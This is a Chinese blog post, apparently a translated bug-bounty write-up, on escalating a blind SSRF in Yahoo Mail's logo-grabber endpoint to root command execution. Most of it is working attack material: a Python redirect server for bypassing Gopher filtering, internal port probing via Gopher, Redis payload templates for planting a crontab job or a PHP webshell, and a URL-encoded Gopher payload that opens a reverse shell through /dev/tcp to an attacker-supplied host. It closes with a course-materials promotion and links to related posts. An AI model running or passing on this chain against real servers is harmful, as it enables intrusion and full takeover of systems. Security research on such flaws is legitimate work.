【网络安全】利用 Gopher 实现雅虎邮件 Blind SSRF 升级至 RCE远程命令执行_ssrf升级为rce

最新推荐文章于 2024-07-17 11:29:00 发布
最新推荐文章于 2024-07-17 11:29:00 发布
阅读量952 收藏 30
点赞数 13
分类专栏: 程序员 文章标签: web安全 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2401_84968101/article/details/138811790
版权 
GET /xxx/logoGrabber?url=gopher://myburpcollaboratorurl
主机:mail.yahoo.com 
...

结果是:没有请求发送到 Burp Collaborator,推断目标服务器可能限制了 Gopher 协议,绕过方法之一是重定向。

测试是否支持重定向:

创建 Python http 服务器:

#!/usr/bin/env python3

import sys
from http.server import HTTPServer, BaseHTTPRequestHandler

# 判断参数数量是否正确
if len(sys.argv)-1 != 2:
    print("""
Usage: {} <port_number> <url>
    """.format(sys.argv[0]))
    sys.exit()


class Redirect(BaseHTTPRequestHandler):

    # 处理 GET 请求
    def do_GET(self):
        # 发送 302 状态码
        self.send_response(302)
        # 设置 Location 响应头,指定重定向的目标 URL
        self.send_header('Location', sys.argv[2])
        # 结束响应头
        self.end_headers()
    
    # 发生错误时的处理方式,也重定向到目标 URL
    def send_error(self, code, message=None):
        self.send_response(302)
        self.send_header('Location', sys.argv[2])
        self.end_headers()

HTTPServer(("", int(sys.argv[1])), Redirect).serve_forever()

再将所有的GET流量都重定向到 Burp Collaborator URL:

python3 302redirect.py port “http://mycollaboratorurl/”

接着构造请求如下:

GET /xxx/logoGrabber?url=http://my302redirectserver/
主机:mail.yahoo.com 
...

在提交请求后,重定向被跟随,导致 Burp Collaborator URL受到了访问。

将重定向与 gopher 结合:

python3 302redirect.py port “gopher://mycollaboratorurl/”

再次构造相同的请求:

GET /xxx/logoGrabber?url=http://my302redirectserver/
主机:mail.yahoo.com 
...

在提交请求后,Burp Collaborator URL受到了访问,显然,重定向与gopher结合成功,则此时可以利用gopher协议访问内部IP。

要实现 gopher 协议的危害升级,可利用工具:gopherus

简单介绍一下gopherus:通过gopherus可构建和发送Gopher请求,并查看响应结果。其可以实现对 MySQL、FastCGI、Memcached、Redis、 Zabbix、SMTP 等的攻击。

由于127.0.0.1在不使用 gopher 的情况下不可访问,且测试数据可控,故测试127.0.0.1。

可以在主机上开启 MySQL 等服务,并记下其端口,再利用 gopherus工具进行 shell。也可通过 302 将网络服务器重定向到 gopher://127.0.0.1:port,然后提交请求来查看哪些端口是开放的:

GET /xxx/logoGrabber?url=http://my302redirectserver/
主机:mail.yahoo.com 
...

回显如下:

302redirect → gopher://127.0.0.1:3306 [响应时间:3000ms]-CLOSED
302redirect → gopher://127.0.0.1:9000 [响应时间:2500ms]-CLOSED
302redirect → gopher://127.0.0.1:6379 [响应时间:500ms]-OPEN
ETC…

可以看到 Redis 服务是开放的,针对 Redis 的利用方法分为两种:

1、利用写入计划任务来执行反弹shell操作

Payload:"*1\r$8\rflushall\r*3\r$3\rset\r$1\r1\r$" + str(len_cmd) + "\r" + cmd + "\r*4\r$6\rconfig\r$3\rset\r$3\rdir\r$" + str(len(crontab_dir)) + "\r" + crontab_dir + "\r*4\r$6\rconfig\r$3\rset\r$10\rdbfilename\r$4\rroot\r*1\r$4\rsave\r"

2、在知晓网站网站绝对路径的情况下,写入phpshell

Payload:"*1\r$8\rflushall\r*3\r$3\rset\r$1\r1\r$" + str(len(php_payload) + 4) + "\r" + php_payload + "\r*4\r$6\rconfig\r$3\rset\r$3\rdir\r$" + str(len(web_root_location)) + "\r" + web_root_location + "\r*4\r$6\rconfig\r$3\rset\r$10\rdbfilename\r$9\rshell.php\r*1\r$4\rsave\r"

选择方法一,构造反弹 shell 脚本如下:

gopher://127.0.0.1:6379/_*1
$8
flushall
*3
$3
set
$1
1
$69


*1 * * * * bash -c "sh -i >& /dev/tcp/xxxx/1337 0>&1"
#将输入和输出重定向至1337端口

*4
$6
config
$3
set
$3
dir
$14
/var/lib/redis
*4
$6
config
$3
set
$10
dbfilename
$4
root
*1
$4
save

对其编码得到:

gopher://127.0.0.1:6379/_%2A1%0D%0A%248%0D%0Aflushall%0D%0A%2A3%0D%0A%243%0D%0Aset%0D%0A%241%0D%0A1% 0D%0A%2469%0D%0A%0A%0A%2A/1%20%2A%20%2A%20%2A%20%2A%20bash%20-c%20%22sh%20-i%20% 3E%26%20/dev/tcp/xxxx/1337%200%3E%261%22%0A%0A%0A%0D%0A%2A4%0D%0A%246%0D%0Aconfig%0D%0A%243% 0D%0Aset%0D%0A%243%0D%0Adir%0D%0A%2414%0D%0A/var/lib/redis%0D%0A%2A4%0D%0A%246%0D%0Aconfig%0D%0A% 243%0D%0Aset%0D%0A%2410%0D%0Adbfilename%0D%0A%244%0D%0Aroot%0D%0A%2A1%0D%0A%244%0D%0Asave%0D%0A%0A

此时在端口 1337 上启动 Netcat 侦听器以捕获任何传入的反弹 shell

接着执行:

python3 302redirect.py port "gopher://127.0.0.1:6379/_%2A1%0D%0A%248%0D%0Aflushall%0D%0A%2A3%0D%0A%243%0D%0Aset%0D%0A%241%0D%0A1%0D%0A%2469%0D%0A%0A%0A%2A/1%20%2A%20%2A%20%2A%20%2A%20bash%20-c%20%22sh%20-i%20%3E%26%20/dev/tcp/x.x.x.x/1337%200%3E%261%22%0A
%0A%0A%0D%0A%2A4%0D%0A%246%0D%0Aconfig%0D%0A%243%0D%0Aset%0D%0A%243%0D%0Adir%0D%0A%2414%0D%0A/var/lib/redis%0D%0A%2A4%0D%0A%246%0D%0Aconfig%0D%0A%243%0D%0Aset%0D%0A%2410%0D%0Adbfilename%0D%0A%244%0D%0Aroot%0D%0A%2A1%0D%0A%244%0D%0Asave%0D%0A%0A"

再提交请求:

GET /xxx/logoGrabber?url=http://my302redirectserver/
主机:mail.yahoo.com 
...

结果如下图,运行 whoami 可以看到回显root,说明RCE成功。

在这里插入图片描述

最后

自我介绍一下,小编13年上海交大毕业,曾经在小公司待过,也去过华为、OPPO等大厂,18年进入阿里一直到现在。

深知大多数网络安全工程师,想要提升技能,往往是自己摸索成长,但自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!

因此收集整理了一份《2024年网络安全全套学习资料》,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友。

img

img

img

img

img

既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,基本涵盖了95%以上网络安全知识点!真正的体系化!

如果你觉得这些内容对你有帮助,需要这份全套学习资料的朋友可以戳我获取!!

由于文件比较大,这里只是将部分目录截图出来,每个节点里面都包含大厂面经、学习笔记、源码讲义、实战项目、讲解视频,并且会持续更新!

(img-oezGjsL9-1715592570512)]

既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,基本涵盖了95%以上网络安全知识点!真正的体系化!

如果你觉得这些内容对你有帮助,需要这份全套学习资料的朋友可以戳我获取!!

由于文件比较大,这里只是将部分目录截图出来,每个节点里面都包含大厂面经、学习笔记、源码讲义、实战项目、讲解视频,并且会持续更新!

2401_84968101
关注
  • 13
    点赞
  • 30
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
网络安全 | CTF】攻防世界 very_easy_sql 解题详析(gopher协议+ssrf漏洞sql注入+盲注脚本)
等风来
08-01 8094
登录处直接注入会提示you are not an inner user, so we can not let you have identify~查看源代码发现use.php,访问后猜测该题为基于ssrf漏洞的sql注入:因此我们可构造含有gopher协议的盲注脚本,通过对use.php界面发送请求来获取flag。具体实现的方法是通过构造不同的poc来进行注入攻击,并利用时间延迟判断是否成功注入。
网络安全利用 Gopher 实现雅虎邮件 Blind SSRF 升级RCE远程命令执行
等风来
01-19 2055
在提交请求后,Burp Collaborator URL受到了访问,显然,重定向与gopher结合成功,则此时可以利用gopher协议访问内部IP。结果是:没有请求发送到 Burp Collaborator,推断目标服务器可能限制了 Gopher 协议,绕过方法之一是重定向。由于127.0.0.1在不使用 gopher 的情况下不可访问,且测试数据可控,故测试127.0.0.1。在提交请求后,重定向被跟随,导致 Burp Collaborator URL受到了访问。
翻译文章 | Just gopher it!无回显SSRF升级RCE
weixin_40418457的博客
06-01 554
前言: 发现此漏洞的bug bounty团队不允许公开披露,因此我不会直接命名所涉及的程序。 我能说的是,这是在Hackerone运行时间最长、规模最大的bug赏金活动中发现的。多个Hackerone的现场黑客活动已经包括这个活动。 毋庸置疑,这是一家拥有世界级安全团队的公司,多年来一直有大量专门针对它的黑客专家——这使得这个漏洞的存在更加令人惊讶。 第1部分:侦察 通常对于一个大范围的bug赏金程序,我会从子域枚举开始,以增加我的攻击面,但在这种情况下,我只针对我的目标上的一个web应用程序。 因为我只专
SSRF到RCE:微软不打算修复Office Online Server 中的这个漏洞
smellycat000的专栏
10-21 408
聚焦源代码安全,网罗国内外最新资讯!编译:代码卫士安全研究员表示,运行Microsoft Offine Online Server 的Windows 服务器可被用于实现服务器端请求伪造 (SSRF),并在主机上实现远程代码执行后果。MDSec 公司的安全研究员表示,已将自己的研究成果通知给微软安全响应中心,但被告知该行为并非漏洞,而是Office Online Server的一个特性,因此将不会...
记一次从盲SSRF到RCE
南迪叶先森
07-08 1507
公粽号:黒掌 一个专注于分享网络安全、黑客圈热点、黑客工具技术区博主! 一 前言 发现此漏洞的漏洞赏金计划不允许公开披露,因此我不会直接使用涉及的系统名称。该项目是发布在Hackerone时间最长漏洞奖金最大的项目之一, Hackerone上有很多关于该项目的黑客事件。这是一家很强大的公司,拥有世界一流的安全团队并且多年来有大量安全专家对这家公司进行测试,这使该漏洞的存在更加令人惊讶。 二 侦查 一般来说,对于一个大范围的漏洞赏金项目,我会进行子域名枚举来增加攻击面,但在本例中,我专注于单一的web目标.
渗透系列:【防守方基础】危险报文识别+Gopher协议在SSRF漏洞中的深入研究(附视频讲解)
01-08
渗透系列:【防守方基础】危险报文识别+Gopher协议在SSRF漏洞中的深入研究(附视频讲解)
【技术分享】SSRF漏洞学习 .pdf
09-05
SSRF(Server-Side Request Forgery,服务器端请求伪造)是一种网络安全漏洞,它允许攻击者利用服务器的身份,发起对外部资源的请求。这些请求可能原本是服务器内部网络的一部分,对外不可见,因此攻击者可以通过...
Gopher China_2015至2019.zip
08-20
Gopher China 是中国最权威、最实力、最干货的 Go 大会,致力于为中国广大的 Gopher 提供最好的技术交流大会。 自2015年主办以来,连续4年都获得了非常好的口碑,每一年的大会从质到量都有一次新的突破。 2019年第五...
GopherServer-master_C#_Gopher_
09-29
GopherServer-master 是一个使用C#编程语言实现Gopher协议服务器项目。Gopher是一种早期的互联网信息检索协议,它在TCP/IP协议栈上运行,主要用于提供文本菜单驱动的信息服务。Gopher协议在Web出现之前非常流行,...
MFC.rar_MFC 网络编程_MFC网络_windows 网络编程
09-20
MFC,全称为Microsoft Foundation Classes,是微软提供的一套C++类库,用于简化Windows应用程序的开发。MFC封装了Windows API,使得开发者能够用面向对象的方式来构建Windows应用,极大地提高了开发效率。在这个"MFC...
Day57:WEB攻防-SSRF服务端请求&Gopher伪协议&无回显利用&黑白盒挖掘&业务功能点
qq_61553520的博客
03-30 1691
小迪安全-Day57:WEB攻防-SSRF服务端请求&Gopher伪协议&无回显利用&黑白盒挖掘&业务功能点
【漏洞学习——SSRF】bilibili某分站从信息泄露到ssrf再到命令执行
Fly_鹏程万里
02-22 977
漏洞细节 这个只是memcache的案例,如果是redis更好利用了0x00 前言 扫描器时常会扫描到一些信息泄露,如discuz的配置文件 /config/config_global.php~  里面时常带有数据库密码等,但又苦于内网,十分尴尬。0x01 个例分析 以bilibili这个为例 http://bbs.biligame.com/config/config_global.php~  ...
网络安全】资产记录工具 Hacker Asset Logger 安装使用详细教程
等风来
07-15 150
在对某一应用程序的多个页面、对多个相关联的应用程序进行渗透测试的过程中,多个请求包的参数、功能之间可能存在一定的联系。例如,在A页面触发的请求包中,通过UID可获取CustomerID;在B页面触发的请求包中,CustomerID用于Cookie身份鉴定、获取用户敏感信息、获取用户订单号OrderNo;在C页面触发的请求包中,OrderNo用于获取对应用户的敏感信息,如姓名、电话、地址、身份证。
网络安全】基于PHP study的DVWA靶场搭建教程
等风来
07-14 473
接着访问:http://127.0.0.1/dvwa-master,拉到页面最下面点击Create/Reset Databse 跳转至该页面后,输入admin、password即可登录:
网络安全-网络安全及其防护措施8
最新发布
LS_Ai的博客
07-17 926
数据中心网络架构是指数据中心内部网络的设计和结构,其目的是提供高性能、高可用性和高扩展性的网络连接。合理的数据中心网络架构能够支持大规模数据处理和传输,满足数据中心的业务需求,提高整体运营效率。负载均衡是一种分配网络流量和计算任务的方法,旨在优化资源利用率、提高系统性能和增强服务可用性。通过将请求分配到多个服务器上,负载均衡避免了单点故障和性能瓶颈,确保系统稳定和高效运行。网络安全策略是指为保护网络和信息系统的安全而制定的一系列规则和措施。
网络安全法律框架更新:最新合规要求与企业应对策略
2301_79955948的博客
07-14 934
首先,企业应提升网络安全意识,完善责任制度,并关注新法律法规的协调衔接。2022年,《网络安全法》迎来了首次修改,这一修订主要是为了与《数据安全法》和《个人信息保护法》等新实施的法律进行衔接协调,完善法律责任制度,进一步保障网络安全。新规定对原有的触发条件进行了优化,例如,关键信息基础设施运营者向境外提供个人信息或重要数据,以及特定数量的个人信息或敏感个人信息的跨境传输,都需要进行安全评估。通过上述措施,企业不仅能够提升自身的网络安全防护能力,还能促进国内网络安全产业的高质量发展,为国家网络安全贡献力量。
等保测评助力网络安全治理现代化
waitaikong_的博客
07-14 356
等保测评,即信息安全等级保护测评,是依据国家相关法律法规和标准,对信息系统进行安全等级划分和安全性能评估的过程。它涵盖了从技术到管理、从人员到流程的多维度评估,旨在确保信息系统在面对各种威胁时的安全性和可靠性。随着网络技术的发展和网络安全形势的变化,等保测评在网络安全治理现代化中扮演着越来越重要的角色。
ctfhub SSRF
08-27
ctfhub是一个CTF训练平台,提供了多个CTF挑战模块,其中包括了SSRF模块。SSRF(Server-Side Request Forgery)是一种攻击技术,可以利用服务器端请求伪造漏洞来发送恶意请求。在ctfhub的SSRF模块中,你可以学习和实践SSRF攻击技术,并利用平台上提供的漏洞来进行实验。 在SSRF中,有一个重要的点是请求可能会跟随302跳转。你可以尝试利用这个来绕过对IP的检测,访问位于127.0.0.1的flag.php文件,从而获取敏感信息。 此外,在SSRF中还可以使用Gopher协议来攻击内网的服务,例如Redis、Mysql、FastCGI、Ftp等等,并发送GET和POST请求。Gopher协议可以说是SSRF中的万金油,大大拓宽了SSRF的攻击面。你可以构造类似于"/?url=file:///var/www/html/flag.php"的本地地址来尝试攻击。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* [network-security:学习web安全练习的靶场,以及总结的思维导图和笔记](https://download.csdn.net/download/weixin_42118423/15763452)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 33.333333333333336%"] - *2* [CTFHub—SSRF](https://blog.csdn.net/qq_45927819/article/details/123400074)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 33.333333333333336%"] - *3* [CTFHUB--SSRF详解](https://blog.csdn.net/qq_49422880/article/details/117166929)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 33.333333333333336%"] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值